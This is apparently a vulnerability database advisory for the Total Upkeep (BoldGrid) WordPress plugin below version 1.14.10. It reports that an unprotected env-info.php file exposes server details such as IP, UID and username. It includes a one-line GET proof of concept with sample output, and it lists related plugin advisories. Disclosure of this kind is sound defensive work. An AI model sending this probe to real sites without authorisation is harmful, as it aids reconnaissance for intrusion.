Total Upkeep by BoldGrid < 1.14.10 – Sensitive Data Disclosure (Server IP Address, UID etc) | Plugin Vulnerabilities

Description

The plugin does not restrict access to a file containing sensitive information, such as the real server IP address, UID and so on, which may help attackers in further attacks.

Proof of Concept

GET /wp-content/plugins/boldgrid-backup/cli/env-info.php

{
    [...],
    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
86_64",
    "php_version":"7.X.X",
    "server_addr":"127.0.0.1",
    "server_name":"www.example.com",
    "server_protocol":"HTTP/1.1",
    "server_software":"Apache/2.X.XX (Ubuntu)",
    "uid":XX,
    "username":"www-data"
}

Affects Plugins

boldgrid-backup

Fixed in 1.14.10

References

Exploitdb

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Wadeek

Verified

Yes

WPVDB ID

f2010bbb-3eb6-4a0c-ae6f-8f88c960ae92

Timeline

Publicly Published

2020-12-14 (about 5 years ago)

Added

2020-12-14 (about 5 years ago)

Last Updated

2020-12-15 (about 5 years ago)

Other

Published

Title

Published

2021-01-22

Title

Doneren met Mollie < 2.8.5 - Unauthorised CSV Export leading to Sensitive Data Disclosure

Published

2021-01-29

Title

Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export

Published

2019-07-17

Title

Coming Soon Page & Maintenance Mode < 1.8.2 - Arbitrary Settings Reset

Published

2020-11-06

Title

WooCommerce < 4.6.2 - Guest Account Creation

Published

2024-05-21

Title

UserPro < 5.1.9 - Unauthenticated Account Takeover to Privilege Escalation